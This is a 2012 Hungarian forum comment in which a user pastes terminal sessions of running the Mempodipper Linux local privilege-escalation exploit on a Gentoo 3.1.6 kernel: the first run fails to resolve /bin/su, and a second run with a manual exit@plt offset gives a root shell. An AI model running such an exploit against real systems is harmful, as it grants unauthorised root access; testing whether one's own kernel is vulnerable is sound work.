( emberk | 2012. 01. 23., h - 18:56 )

ugyanez. Nem működik.:

------ek@daemon ~ $ uname -a
Linux daemon 3.1.6-gentoo #1 SMP Fri Dec 30 23:09:36 CET 2011 x86_64 Intel(R) Core(TM) i5-2500 CPU @ 3.30GHz GenuineIntel GNU/Linux
ek@daemon ~ $ whoami
ek
ek@daemon ~ $ ./memd
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3925/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./memd -o ADDRESS
[-] Example: ./memd -o 0x402178
ek@daemon ~ $ whoami
ek
ek@daemon ~ $

viszont a megadott paraméterrel:
./memd -o 0x402178
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3961/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x402162.
[+] Executing su with shellcode.
sh-4.1# whoami
root
sh-4.1# exit
exit
ek@daemon ~ $

Szóval nem fenékig tejfel.

3 fajta matematikus létezik. Aki tud számolni, és aki nem.